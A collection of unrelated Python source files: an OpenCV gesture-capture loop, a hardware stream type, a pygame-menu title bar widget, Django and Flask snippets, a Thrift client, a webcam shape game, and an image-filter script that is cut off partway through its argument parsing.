if binaryMode == True:
roi = binaryMask(frame, x0, y0, width, height)
else:
roi = skinMask(frame, x0, y0, width, height)
cv2.putText(frame,'Options:',(fx,fy), font, 0.7,(0,255,0),2,1)
cv2.putText(frame,'b - Toggle Binary/SkinMask',(fx,fy + fh), font, size,(0,255,0),1,1)
cv2.putText(frame,'g - Toggle Prediction Mode',(fx,fy + 2*fh), font, size,(0,255,0),1,1)
cv2.putText(frame,'q - Toggle Quiet Mode',(fx,fy + 3*fh), font, size,(0,255,0),1,1)
cv2.putText(frame,'n - To enter name of new gesture folder',(fx,fy + 4*fh), font, size,(0,255,0),1,1)
cv2.putText(frame,'s - To start capturing new gestures for training',(fx,fy + 5*fh), font, size,(0,255,0),1,1)
cv2.putText(frame,'ESC - Exit',(fx,fy + 6*fh), font, size,(0,255,0),1,1)
## If enabled will stop updating the main openCV windows
## Way to reduce some processing power :)
if not quietMode:
cv2.imshow('Original',frame)
cv2.imshow('ROI', roi)
# Keyboard inputs
key = cv2.waitKey(10) & 0xff
## Use Esc key to close the program
if key == 27:
break
## Use b key to toggle between binary threshold or skinmask based filters
elif key == ord('b'):
binaryMode = not binaryMode
if binaryMode:
print "Binary Threshold filter active"
else:
print "SkinMask filter active"
## Use g key to start gesture predictions via CNN
elif key == ord('g'):
guessGesture = not guessGesture
print "Prediction Mode - {}".format(guessGesture)
## This option is not yet complete. So disabled for now
## Use v key to visualize layers
#elif key == ord('v'):
# visualize = True
## Use i,j,k,l to adjust ROI window
elif key == ord('i'):
y0 = y0 - 5
elif key == ord('k'):
y0 = y0 + 5
elif key == ord('j'):
x0 = x0 - 5
elif key == ord('l'):
x0 = x0 + 5
## Quiet mode to hide gesture window
elif key == ord('q'):
quietMode = not quietMode
print "Quiet Mode - {}".format(quietMode)
## Use s key to start/pause/resume taking snapshots
## numOfSamples controls number of snapshots to be taken PER gesture
elif key == ord('s'):
saveImg = not saveImg
if gestname != '':
saveImg = True
else:
print "Enter a gesture group name first, by pressing 'n'"
saveImg = False
## Use n key to enter gesture name
elif key == ord('n'):
gestname = raw_input("Enter the gesture folder name: ")
try:
os.makedirs(gestname)
except OSError as e:
# if directory already present
if e.errno != 17:
print 'Some issue while creating the directory named -' + gestname
path = "./"+gestname+"/"
#elif key != 255:
# print key
#Realse & destroy
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
Main()
|
from math import inf, isinf
from typing import List, Optional
from hwt.doc_markers import internal
from hwt.hdl.types.hdlType import HdlType
from hwt.serializer.generic.indent import getIndent
class HStream(HdlType):
"""
Stream is an abstract type. It is an array with unspecified size.
:ivar ~.element_t: type of smalest chunk of data
which can be send over this stream
:ivar ~.len_min: minimum repetitions of element_t (inclusive interval)
:ivar ~.len_max: maximum repetitions of element_t (inclusive interval)
:ivar ~.start_offsets: list of numbers which represents the number of invalid bytes
before valid data on stream (invalid bytes means the bytes
which does not have bit validity set, e.g. Axi4Stream keep=0b10 -> offset=1
)
"""
def __init__(self, element_t,
frame_len=inf,
start_offsets: Optional[List[int]]=None,
const=False):
super(HStream, self).__init__(const=const)
self.element_t = element_t
if isinstance(frame_len, float) and isinf(frame_len):
frame_len = (1, inf)
elif isinstance(frame_len, int):
frame_len = (frame_len, frame_len)
self.len_min, self.len_max = frame_len
if start_offsets is None:
start_offsets = (0, )
self.start_offsets = tuple(start_offsets)
def bit_length(self):
if self.len_min != self.len_max or isinf(self.len_max):
raise TypeError("This HStream does not have constant size", self)
else:
# len_min == len_max
return self.len_min * self.element_t.bit_length()
def __eq__(self, other: HdlType):
if self is other:
return True
if (type(self) is type(other)):
if self.start_offsets == other.start_offsets \
and self.len_min == other.len_min \
and self.len_max == other.len_max:
return self.element_t == other.element_t
return False
def __hash__(self):
return hash((self.start_offsets, self.len_min, self.len_max, self.element_t))
@internal
@classmethod
def getValueCls(cls):
try:
return cls._valCls
except AttributeError:
from hwt.hdl.types.streamVal import HStreamVal
cls._valCls = HStreamVal
return cls._valCls
def __repr__(self, indent=0, withAddr=None, expandStructs=False):
return "%s<%s len:%s, align:%r\n%s>" % (
getIndent(indent),
self.__class__.__name__,
(self.len_min, self.len_max),
self.start_offsets,
self.element_t.__repr__(indent=indent+1,
withAddr=withAddr,
expandStructs=expandStructs),
)
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
MENUBAR
MenuBar class to display the Menu title.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
# File constants no. 1000
__all__ = [
# Main class
'MenuBar',
# Menubar styles
'MENUBAR_STYLE_ADAPTIVE',
'MENUBAR_STYLE_SIMPLE',
'MENUBAR_STYLE_TITLE_ONLY',
'MENUBAR_STYLE_TITLE_ONLY_DIAGONAL',
'MENUBAR_STYLE_NONE',
'MENUBAR_STYLE_UNDERLINE',
'MENUBAR_STYLE_UNDERLINE_TITLE',
# Custom types
'MenuBarStyleModeType'
]
import pygame
import pygame.gfxdraw as gfxdraw
import pygame_menu.controls as ctrl
from pygame_menu.locals import FINGERUP, POSITION_EAST, POSITION_WEST, POSITION_NORTH, \
POSITION_SOUTH
from pygame_menu.utils import assert_color, get_finger_pos, warn
from pygame_menu.widgets.core import Widget
from pygame_menu._types import Tuple, CallbackType, Tuple2IntType, Literal, Any, \
Optional, NumberInstance, ColorInputType, EventVectorType, VectorInstance, \
List, ColorType, NumberType
# Menubar styles
MENUBAR_STYLE_ADAPTIVE = 1000
MENUBAR_STYLE_SIMPLE = 1001
MENUBAR_STYLE_TITLE_ONLY = 1002
MENUBAR_STYLE_TITLE_ONLY_DIAGONAL = 1003
MENUBAR_STYLE_NONE = 1004
MENUBAR_STYLE_UNDERLINE = 1005
MENUBAR_STYLE_UNDERLINE_TITLE = 1006
# Menubar operation modes
_MODE_CLOSE = 1020
_MODE_BACK = 1021
# Custom types
MenuBarStyleModeType = Literal[MENUBAR_STYLE_ADAPTIVE, MENUBAR_STYLE_SIMPLE,
MENUBAR_STYLE_TITLE_ONLY,
MENUBAR_STYLE_TITLE_ONLY_DIAGONAL,
MENUBAR_STYLE_NONE, MENUBAR_STYLE_UNDERLINE,
MENUBAR_STYLE_UNDERLINE_TITLE]
# noinspection PyMissingOrEmptyDocstring
class MenuBar(Widget):
"""
MenuBar widget.
.. note::
This widget does not accept scale/resize transformation.
:param title: Title of the menubar
:param width: Width of the widget, generally width of the Menu
:param background_color: Background color
:param menubar_id: ID of the MenuBar
:param back_box: Draw a back-box button on header
:param back_box_background_color: Back-box button color
:param mode: Mode of drawing the bar
:param modify_scrollarea: If ``True`` it modifies the scrollbars of the scrollarea depending on the bar mode
:param offsetx: Offset x-position of title in px
:param offsety: Offset y-position of title in px
:param onreturn: Callback when pressing the back-box button
:param args: Optional arguments for callbacks
:param kwargs: Optional keyword arguments for callbacks
"""
_backbox: bool
_backbox_background_color: ColorType
_backbox_border_width: int
_backbox_pos: Any
_backbox_rect: Optional['pygame.Rect']
_box_mode: int
_modify_scrollarea: bool
_offsetx: NumberType
_offsety: NumberType
_polygon_pos: Any
_scrollbar_deltas: List[Tuple[int, Tuple2IntType]]
_style: int
_width: int
fixed: bool
def __init__(
self,
title: Any,
width: NumberType,
background_color: ColorInputType,
menubar_id: str = '',
back_box: bool = False,
back_box_background_color: ColorInputType = (0, 0, 0),
mode: MenuBarStyleModeType = MENUBAR_STYLE_ADAPTIVE,
modify_scrollarea: bool = True,
offsetx: NumberType = 0,
offsety: NumberType = 0,
onreturn: CallbackType = None,
*args,
**kwargs
) -> None:
assert isinstance(width, NumberInstance)
assert isinstance(back_box, bool)
background_color = assert_color(background_color)
back_box_background_color = assert_color(back_box_background_color)
# MenuBar has no ID
super(MenuBar, self).__init__(
args=args,
kwargs=kwargs,
onreturn=onreturn,
title=title,
widget_id=menubar_id
)
self._backbox = back_box
self._backbox_background_color = back_box_background_color
self._backbox_border_width = 1 # px
self._backbox_pos = None
self._backbox_rect = None
self._background_color = background_color
self._box_mode = 0
self._modify_scrollarea = modify_scrollarea
self._mouseover_check_rect = lambda: self._backbox_rect
self._offsetx = 0
self._offsety = 0
self._polygon_pos = None
# north, east, south, west
self._scrollbar_deltas = [(0, (0, 0)), (0, (0, 0)), (0, (0, 0)), (0, (0, 0))]
self._style = mode
self._title = ''
self._width = int(width)
self.set_title(title, offsetx, offsety)
# Public's
self.is_selectable = False
self.fixed = True
def _apply_font(self) -> None:
pass
def set_padding(self, *args, **kwargs) -> 'MenuBar':
return self
def scale(self, *args, **kwargs) -> 'MenuBar':
return self
def resize(self, *args, **kwargs) -> 'MenuBar':
return self
def rotate(self, *args, **kwargs) -> 'MenuBar':
return self
def set_max_height(self, *args, **kwargs) -> 'MenuBar':
return self
def set_max_width(self, *args, **kwargs) -> 'MenuBar':
return self
def set_selection_effect(self, *args, **kwargs) -> 'MenuBar':
return self
def set_border(self, *args, **kwargs) -> 'MenuBar':
return self
def flip(self, *args, **kwargs) -> 'MenuBar':
return self
def _check_title_color(self, background_menu: bool) -> None:
"""
Performs title color and prints a warning if the color is similar to the
background.
:return: None
"""
if background_menu and self._menu is not None:
c_back = self._menu.get_theme().background_color
else:
c_back = self._background_color
if not isinstance(c_back, VectorInstance): # If is color
return
tol = 5
c_dif_1 = abs(c_back[0] - self._font_color[0])
c_dif_2 = abs(c_back[1] - self._font_color[1])
c_dif_3 = abs(c_back[2] - self._font_color[2])
if c_dif_1 < tol and c_dif_2 < tol and c_dif_3 < tol:
warn(
'title font color {0} is {3} to the {1} background color {2}, '
'consider editing your Theme'.format(
self._font_color,
'menu' if background_menu else 'title',
c_back,
'equal' if c_dif_1 == c_dif_2 == c_dif_3 == 0 else 'similar'
)
)
def get_title_offset(self) -> Tuple2IntType:
"""
Return the title offset on x-axis and y-axis (x, y) in px.
:return: Title offset
"""
return int(self._offsetx), int(self._offsety)
def set_backbox_border_width(self, width: int) -> None:
"""
Set backbox border width in px.
:param width: Width in px
:return: None
"""
assert isinstance(width, int)
assert width > 0
self._backbox_border_width = width
def _draw_background_color(self, *args, **kwargs) -> None:
pass
def _draw_border(self, *args, **kwargs) -> None:
pass
def _backbox_visible(self) -> bool:
"""
Returns ``True`` if backbox is visible.
:return: Bool
"""
# The following check belongs to the case if the Menu displays a "x" button
# to close the Menu, but onclose Menu method is None (Nothing is executed),
# then the button will not be displayed
# noinspection PyProtectedMember
return self._mouse_enabled and self._backbox and \
not (self._box_mode == _MODE_CLOSE and
self._menu is not None and
self._menu._onclose is None)
def _draw(self, surface: 'pygame.Surface') -> None:
if len(self._polygon_pos) > 2:
gfxdraw.filled_polygon(surface, self._polygon_pos, self._background_color)
# Draw backbox if enabled
if self._backbox_visible():
# noinspection PyArgumentList
pygame.draw.rect(surface, self._backbox_background_color,
self._backbox_rect, self._backbox_border_width)
pygame.draw.polygon(surface, self._backbox_background_color,
self._backbox_pos)
surface.blit(self._surface,
(self._rect.topleft[0] + self._offsetx,
self._rect.topleft[1] + self._offsety))
def get_scrollbar_style_change(self, position: str) -> Tuple[int, Tuple2IntType]:
"""
Return scrollbar change (width, position) depending on the style of the
menubar.
:param position: Position of the scrollbar
:return: Change in length and position in px
"""
self._render()
if not self._modify_scrollarea or not self.is_visible():
return 0, (0, 0)
if not self.fixed or self.is_floating():
if self._style == MENUBAR_STYLE_ADAPTIVE:
if position == POSITION_EAST:
t = self._polygon_pos[4][1] - self._polygon_pos[2][1]
return t, (0, -t)
return 0, (0, 0)
if position == POSITION_NORTH:
return self._scrollbar_deltas[0]
elif position == POSITION_EAST:
return self._scrollbar_deltas[1]
elif position == POSITION_SOUTH:
return self._scrollbar_deltas[2]
elif position == POSITION_WEST:
return self._scrollbar_deltas[3]
return 0, (0, 0)
def _render(self) -> Optional[bool]:
if self._menu is None:
return
# noinspection PyProtectedMember
menu_prev_condition = not self._menu or not self._menu._top or not self._menu._top._prev
if not self._render_hash_changed(
self._menu.get_id(), self._rect.x, self._rect.y, self._title,
self._visible, self._font_selected_color, menu_prev_condition):
return True
# Update box mode
if menu_prev_condition:
self._box_mode = _MODE_CLOSE
else:
self._box_mode = _MODE_BACK
self._surface = self._render_string(self._title, self._font_selected_color)
self._rect.width, self._rect.height = self._surface.get_size()
self._apply_transforms() # Rotation does not affect rect size
dy = 0
if self._style == MENUBAR_STYLE_ADAPTIVE:
"""
A-------------------B D-E: 25 dx
|**** x | *0,6 height
| D------------C
F----E/
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height * 0.6
d = self._rect.x + self._rect.width + 25 + self._offsetx, \
self._rect.y + self._rect.height * 0.6
e = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
f = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d, e, f
cross_size = int(self._rect.height * 0.6)
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_SIMPLE:
"""
A-------------------B
|**** x | *1,0 height
D-------------------C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-self._rect.height, (0, self._rect.height)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_TITLE_ONLY:
"""
A-----B
| *** | x *0,6 height
D-----C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._rect.width + 5 + self._offsetx, self._rect.y
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_TITLE_ONLY_DIAGONAL:
"""
A--------B
| **** / x *0,6 height
D-----C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._rect.width + 25 + self._offsetx, self._rect.y
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_NONE:
"""
A------------------B
**** x *0,6 height
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
self._polygon_pos = a, b
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
elif self._style == MENUBAR_STYLE_UNDERLINE:
"""
**** x
A-------------------B *0,09 height
D-------------------C
"""
# dy = 0
a = self._rect.x, self._rect.y + 0.91 * self._rect.height + dy
b = self._rect.x + self._width - 1, self._rect.y + 0.91 * self._rect.height + dy
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height + dy
d = self._rect.x, self._rect.y + self._rect.height + dy
self._polygon_pos = a, b, c, d
cross_size = int(0.6 * self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-self._rect.height, (0, self._rect.height)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
elif self._style == MENUBAR_STYLE_UNDERLINE_TITLE:
"""
**** x
A----B *0,09 height
D----C
"""
# dy = 3
a = self._rect.x, self._rect.y + 0.91 * self._rect.height + dy
b = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + 0.91 * self._rect.height + dy
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height + dy
d = self._rect.x, self._rect.y + self._rect.height + dy
self._polygon_pos = a, b, c, d
cross_size = int(0.6 * self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
else:
raise ValueError('invalid menubar mode {0}'.format(self._style))
self._rect.height += dy
# Create the back box
if self._backbox:
backbox_margin = 4
# Subtract the scrollarea thickness if float and enabled
scroll_delta = 0
if self._floating and self._menu is not None:
scroll_delta = self._menu.get_width() - self._menu.get_width(inner=True)
self._backbox_rect = pygame.Rect(
int(self._rect.x + self._width - cross_size + backbox_margin - scroll_delta),
int(self._rect.y + backbox_margin),
int(cross_size - 2 * backbox_margin),
int(cross_size - 2 * backbox_margin)
)
if self._box_mode == _MODE_CLOSE:
# Make a cross for top Menu
self._backbox_pos = (
(self._backbox_rect.left + 4, self._backbox_rect.top + 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.right - 4, self._backbox_rect.top + 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.right - 4, self._backbox_rect.bottom - 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.left + 4, self._backbox_rect.bottom - 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.left + 4, self._backbox_rect.top + 4)
)
elif self._box_mode == _MODE_BACK:
# Make a back arrow for sub-menus
self._backbox_pos = (
(self._backbox_rect.left + 5, self._backbox_rect.centery),
(self._backbox_rect.centerx, self._backbox_rect.top + 5),
(self._backbox_rect.centerx, self._backbox_rect.centery - 2),
(self._backbox_rect.right - 5, self._backbox_rect.centery - 2),
(self._backbox_rect.right - 5, self._backbox_rect.centery + 2),
(self._backbox_rect.centerx, self._backbox_rect.centery + 2),
(self._backbox_rect.centerx, self._backbox_rect.bottom - 5),
(self._backbox_rect.left + 5, self._backbox_rect.centery)
)
def set_title(self, title: Any, offsetx: NumberType = 0, offsety: NumberType = 0) -> 'MenuBar':
"""
Set the menubar title.
:param title: Menu title
:param offsetx: Offset x-position of title in px
:param offsety: Offset y-position of title in px
:return: Self reference
"""
assert isinstance(offsetx, NumberInstance)
assert isinstance(offsety, NumberInstance)
self._title = str(title)
self._offsety = offsety
self._offsetx = offsetx
if self._menu is not None:
self._render()
return self
def get_height(self, apply_padding: bool = True, apply_selection: bool = False) -> int:
if self._floating or not self.is_visible():
return 0
return super(MenuBar, self).get_height(apply_padding, apply_selection)
def update(self, events: EventVectorType) -> bool:
self.apply_update_callbacks(events)
if self.readonly or not self.is_visible():
return False
updated = False
for event in events:
# Check mouse over
if self._backbox_visible():
self._check_mouseover(event)
# User clicks/touches the backbox rect; don't consider the mouse wheel (button 4 & 5)
if event.type == pygame.MOUSEBUTTONUP and self._mouse_enabled and \
event.button in (1, 2, 3) or \
event.type == FINGERUP and self._touchscreen_enabled and \
self._menu is not None:
event_pos = get_finger_pos(self._menu, event)
if self._backbox_rect and self._backbox_rect.collidepoint(*event_pos):
self._sound.play_click_mouse()
self.apply()
updated = True
# User applies joy back button
elif event.type == pygame.JOYBUTTONDOWN and self._joystick_enabled:
if event.button == ctrl.JOY_BUTTON_BACK:
self._sound.play_key_del()
self.apply()
updated = True
return updated
|
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
}
INSTALLED_APPS = [
'tests.testapp',
]
CACHES = {
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': '127.0.0.1:6379',
'OPTIONS': { # optional
'DB': 15,
'PASSWORD': 'yadayada',
},
},
}
ROOT_URLCONF = 'tests.urls'
|
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from .gen_inbox.inbox import TInboxService
class Client:
def __init__(self, ip_address, port, timeout=10000):
self._socket = TSocket.TSocket(ip_address, port)
self._socket.setTimeout(timeout)
self._transport = TTransport.TBufferedTransport(self._socket)
self._protocol = TBinaryProtocol.TBinaryProtocol(self._transport)
self._tclient = TInboxService.Client(self._protocol)
self._transport.open()
def __del__(self):
self.close()
def close(self):
if self._transport.isOpen():
self._transport.close()
def push(self, inbox_name, message_text):
return self._tclient.push(inbox_name=inbox_name, message_text=message_text)
def fetch(self, inbox_name, n, offset):
return self._tclient.fetch(inbox_name=inbox_name, n=n, offset=offset)
|
from flask import Blueprint
from pf_auth.dto.operator_dto import LoginResponseDto, LoginDto, RefreshTokenDto, LoginTokenDto, RefreshTokenResponseDto
from pf_auth.service.operator_service import OperatorService
from pfms.swagger.pfms_swagger_decorator import simple_get, pfms_post_request
operator_controller = Blueprint("operator_controller", __name__, url_prefix="/api/v1/operator")
operator_service = OperatorService()
@operator_controller.route("/init", methods=['GET'])
@simple_get(only_message=True)
def initialize():
is_created = operator_service.init_default_operator()
if is_created:
return operator_service.success("Successfully Initialized")
return operator_service.error("Unable to Initialize")
@operator_controller.route("/login", methods=["POST"])
@pfms_post_request(request_body=LoginDto, response_obj=LoginResponseDto)
def login():
return operator_service.login_operator()
@operator_controller.route("/renew-token", methods=["POST"])
@pfms_post_request(request_body=RefreshTokenDto, response_obj=RefreshTokenResponseDto)
def renew_token():
return operator_service.renew_token()
@operator_controller.route("/test", methods=['GET'])
@simple_get(only_message=True)
def test():
return operator_service.error("Test Actions")
|
# Why this file exists:
# This file exists because of the circular dependency between emu.instruction
# and util.parse. doing any sort of `from util.parse import` in emu.instruction
# will fail because util.parse also requires emu.instruction.Instruction
# however, but that hasn't been loaded yet at import time. So we use this
# shared file instead. Alternatively, all the `from util.parse import` lines
# could go beneath the Instruction class declaration, but that's messy
def get_imm(imm):
return int(imm, 16) if imm.startswith('0x') else int(imm)
def get_section(raw, off, size):
return raw[off:off+size]
|
import abc
from utils.mixins import RenderMixin, CheckMethodsMixin
class View(RenderMixin, CheckMethodsMixin, abc.ABC):
_methods = [
'render',
]
_columns_width = [6, 3]
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._check_class()
|
# coding: utf-8
from django.contrib import admin
from .models import Task,Attendance,Emergency
# Register your models here.
admin.site.register(Task)
admin.site.register(Attendance)
admin.site.register(Emergency) |
"""Game of ninja for geometric shapes."""
import numpy as np
import cv2
def dist(x1, x2, y1, y2):
return ((x2 - x1) ** 2. + (y2 - y1) ** 2.) ** 0.5
class Ninja:
frame_name = 'ninja'
def __init__(self, width: int, height: int):
self.shapes = []
self.garbage = []
self.probability_shape_spawn = 0.05
self.height = height
self.width = width
def update(self):
for i, shape in enumerate(self.shapes):
shape['y'] += shape['vy']
if shape['y'] > self.height:
self.garbage.append(shape)
if np.random.random() < self.probability_shape_spawn:
x = int(np.random.random() * self.width)
self.add_circle(x, 10)
for shape in self.garbage:
if shape in self.shapes:
self.shapes.remove(shape)
self.garbage = []
def draw(self, frame: np.array):
for shape in self.shapes:
shape['draw'](frame, shape['y'])
def check(self, mag, ang, frame):
"""Check if any of the shapes have been touched.
(In the future, check if any have been sliced.)
"""
ys, xs = np.nonzero(mag > 35)
self.any_strike(xs, ys)
for x, y in zip(xs, ys):
cv2.circle(frame, (x, y), 5, (0, 255, 0), -1)
def add_circle(self, x: int, r: int, color: tuple=(0, 0, 255), vy: int=10):
self.shapes.append({
'x': x,
'y': 0,
'vy': vy,
'draw': lambda frame, y: cv2.circle(frame, (x, y), r, color, -1),
'any_touch': lambda x, y, shape: \
(dist(x, shape['x'], y, shape['y']) <= r).any(),
})
def any_strike(self, x, y):
for i, shape in enumerate(self.shapes):
if shape['any_touch'](x, y, shape):
self.garbage.append(shape)
def on_mouse(self, event, x, y, flags, param):
self.any_strike(x, y)
def bind_mouse_callback(self):
cv2.namedWindow(self.frame_name)
cv2.setMouseCallback(self.frame_name, self.on_mouse)
if __name__ == '__main__':
game = Ninja(420, 640)
cap = cv2.VideoCapture(0)
game.bind_mouse_callback()
while True:
_, frame = cap.read()
frame = cv2.resize(frame, (640, 420))
game.update()
game.draw(frame)
cv2.imshow(game.frame_name, frame)
if cv2.waitKey(1) & 0xff == ord('q'):
break
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from numpy import array, linspace, meshgrid, pi, zeros, sin, sqrt, arctan2
from numpy import save as npsave
from numpy import load as npload
from numpy.fft import fft, ifft
from scipy.ndimage import geometric_transform as transform
import argparse
import os
import sys
import time
parser = argparse.ArgumentParser(
description="Applies a filter to an image reconstructed from its Polar Broken Ray transform.")
parser.add_argument("--in", "-i", dest="input", action="store",
help="Input file. Default: <stdin>.", default="-")
parser.add_argument("--out", "-o", dest="output", action="store",
help="Output file. Default: <stdout>.", default="-")
parser.add_argument("--roi", "-R", dest="roi",
action="store", help="Specify region of interest. Format: xmin:xmax:ymin:ymax")
parser.add_argument("--size", "-S", dest="size",
action="store", help="Specify desired size. Format width:height.")
parser.add_argument("--beta", "-b", dest="beta",
action="store", help="Filter parameter beta.", default=None)
parser.add_argument("--overwrite", "-y", dest="overwrite",
action='store_const', help="Overwrite output file, if it exists.", const=True)
parser.add_argument("--no-overwrite", "-n", dest="nooverwrite", action='store_const',
help="Do not overwrite output file, if it exists.", const=True)
args = parser.parse_args()
msgout = sys.stdout if sys.stdout.isatty() else sys.stderr
if args.overwrite and args.nooverwrite:
print >>sys.stderr, "Cannot specify both '-y' and '-n'!"
sys.exit()
if args.input == "-":
if sys.stdin.isatty():
print >>sys.stderr, "Surely you are not typing the raw data into the terminal. Please specify input file, or pipe input from another program.\n"
parser.print_help(sys.stderr)
sys.exit()
infile = sys.stdin
else:
infile = open(args.input, "rb")
if args.output == "-":
if sys.stdout.isatty():
print >>sys.stderr, "Cowardly refusing to write binary data to terminal. Please specify output file, or redirect output to a pipe.\n"
parser.print_help(sys.stderr)
sys.exit()
outfile = sys.stdout
print >>sys.stderr, "Writing data to <stdout>."
else:
if os.path.exists(args.output):
if args.nooverwrite:
print >>sys.stderr, "Error: Output file '%s' exists. Terminating because '-n' was specified." % args.output
sys.exit()
elif args.overwrite:
print >>msgout, "Warning: Output file '%s' exists. Overwriting because '-y' was specified." % args.output
elif sys.stdin.isatty() and sys.stdout.isatty():
overwrite = raw_input(
"Warning: Output file '%s' exists. Do you wish to overwrite file? (Y/N) " % args.output)
while overwrite.upper() not in ("Y", "N", "YES", "NO"):
print >>msgout, "Invalid answer: '%s'" % overwrite
overwrite = raw_input(
"Warning: Output file '%s' exists. Do you wish to overwrite file? (Y/N) " % args.output)
if overwrite.upper() in ("Y", "YES"):
print >>msgout, "Overwriting '%s'." % args.output
print >>msgout, ""
elif overwrite.upper() in ("N", "NO"):
print >>msgout, "Operation aborted."
sys.exit()
else:
print >>sys.stderr, "Operation aborted. Cowardly refusing to overwrite '%s'." % args.output
sys.exit()
outfile = args.output
tag = npload(infile)
metadata = npload(infile)
data = npload(infile)
if infile is not sys.stdin:
infile.close()
fdata = fft(data, axis=0)
if len(data.shape) != 2:
print >>sys.stderr, "Expected a two-dimensional array. Got an array with shape %s instead." % (
data.shape,)
sys.exit()
kind_str = {
"f": "floating point",
"i": "integer",
"u": "unsigned integer",
"b": "boolean",
"c": "complex"
}
if data.dtype.kind in "iub":
print >>sys.stderr, "Error: Data type '%s' not supported." % kind_str[
data.dtype.kind]
sys.exit()
(rmin, rmax, thetamin, thetamax) = metadata
H, W = data.shape
print >>msgout, u"Array information:"
print >>msgout, u" %.5f ≤ r ≤ %.5f, W = %d, ∆r = %.5f" % \
(rmin, rmax, W, (rmax - rmin) / (W - 1))
print >>msgout, u" %.5f ≤ θ ≤ %.5f, H = %d, ∆θ = %.5f" % \
(thetamin, thetamax, H, (thetamax - thetamin) / (H - 1))
print >>msgout, "Data type: %d-bit %s" % (
8 * data.dtype.alignment, kind_str[data.dtype.kind])
if args.roi is None:
xmin = ymin = 0
xmax = ymax = rmax
else:
try:
xmin, xmax, ymin, ymax = args.roi.split(":")
except:
print >>sys.stderr, "Bad parameter for roi. Expected colon-delimited list of four floating points or integers, got '%s' instead.\n" % args.roi
parser.print_help(sys.stderr)
sys.exit()
try:
xmin = float(xmin)
except:
print >>sys.stderr, "Bad parameter for xmin. Expected floating point or integer, got '%s' instead.\n" % xmin
parser.print_help(sys.stderr)
sys.exit()
try:
ymin = float(ymin)
except:
print >>sys.stderr, "Bad parameter for ymin. Expected floating point or integer, got '%s' instead.\n" % ymin
parser.print_help(sys.stderr)
sys.exit()
try:
xmax = float(xmax)
